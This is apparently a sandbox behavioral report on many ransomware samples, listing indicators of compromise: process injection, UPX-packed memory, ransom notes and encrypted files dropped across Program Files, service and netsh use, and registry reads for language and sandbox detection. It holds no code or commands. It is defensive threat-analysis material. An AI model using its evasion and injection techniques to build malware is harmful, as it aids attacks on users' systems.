description pid Process procid_target PID 3092 set thread context of 5160 3092 Chrome1.exe 145 PID 3956 set thread context of 6848 3956 hjcnucqg.exe 290 PID 2976 set thread context of 7464 2976 HEUR-Trojan-Ransom.MSIL.Blocker.gen-0248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141.exe 388 PID 4364 set thread context of 6236 4364 HEUR-Trojan-Ransom.MSIL.Blocker.gen-e6d666ed79c85e0c1eca9dcebf01f9caf42101569b6c6b0e0f8f594814b9661f.exe 389 PID 3412 set thread context of 6524 3412 HEUR-Trojan-Ransom.MSIL.Blocker.gen-d838bac7ab25b90356a5280bba7cb299f087c4a90c7a2216b8415140f23ba1e7.exe 412 PID 6436 set thread context of 7164 6436 mdwm.exe 416 PID 6436 set thread context of 7444 6436 mdwm.exe 427 -
resource yara_rule behavioral1/memory/4964-397-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/files/0x0007000000023cb7-396.dat upx behavioral1/memory/4964-2663-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/memory/7164-5928-0x0000000000730000-0x0000000000B14000-memory.dmp upx behavioral1/memory/7164-5929-0x0000000000730000-0x0000000000B14000-memory.dmp upx behavioral1/memory/7444-5949-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/7444-5950-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/7444-5951-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/7444-5955-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/7444-5961-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/7444-5977-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/7444-5979-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/files/0x000a000000024cd6-5981.dat upx behavioral1/memory/4964-5997-0x0000000000400000-0x00000000005BB000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\beeps\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Common Files\microsoft shared\ink\es-MX\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Google\Chrome\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-100.png.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxGamingOverlay_2.34.28001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Diagnostics\Comprehensive\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Windows Media Player\fr-FR\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Windows Multimedia Platform\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-white\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Windows Photo Viewer\uk-UA\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\Office16\XLSTART\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2020.1906.55.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\az-Latn-AZ\View3d\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppxMetadata\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\THMBNAIL.PNG.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\fil-PH\View3d\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_company.png.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-black\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\Attribution\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\microsoft.system.package.metadata\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png.encryptSIZE HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ENFR\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-black\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\no\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.2.2_2.2.27405.0_x64__8wekyb3d8bbwe\AppxMetadata\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\js\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-white\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\7-Zip\Lang\tg.txt.encryptSIZE HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\rsod\osmux.x-none.msi.16.x-none.tree.dat.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Mozilla Firefox\platform.ini.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\bn-BD\View3d\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\7-Zip\Lang\ta.txt.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\7-Zip\Lang\fr.txt.encryptSIZE HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-140.png.encryptSIZE HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\THMBNAIL.PNG.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\System\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5664 sc.exe 5800 sc.exe 5156 sc.exe -
pid Process 1280 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 7 IoCs
pid pid_target Process procid_target 8140 4652 WerFault.exe 143 4232 3956 WerFault.exe 168 7720 6236 WerFault.exe 389 4100 6236 WerFault.exe 389 2008 4664 WerFault.exe 128 2824 6236 WerFault.exe 389 7524 7164 WerFault.exe 416 -
System Location Discovery: System Language Discovery 1 TTPs 42 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BUSY PATCH all in one.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-d838bac7ab25b90356a5280bba7cb299f087c4a90c7a2216b8415140f23ba1e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Darkside.gen-d08df92080356816053dbfd234698d8aba26cd7b2839f8d0d1e0d1cba6d3b1d7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hjcnucqg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec9d6ecfa11802ce0588b8a5dcd6ffe65e91a8f3a7decf0bbbdb811f1eb321a5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Agent.gen-797f540cc4c0e293f6939f43ae351a275cd9a33cf30f4e306bcb66337e790e46.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language user.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wdhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-0248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Agent.gen-220a16db1e97f5257b8403d4921ef514e32286a46d322a48c7a36ecfd0fb1494.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mdwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.gen-0153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-2860cedf266d9bb8b33786cddf972c73e294edece6100087802102e9f0100d21.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Crypmod.gen-dc23e2cdcb80b42837c16485811e92a597461e28ed6e170d5958ff0d5f699d09.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wdhost.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3232 cmd.exe 7276 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 HEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc HEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 HEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc HEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
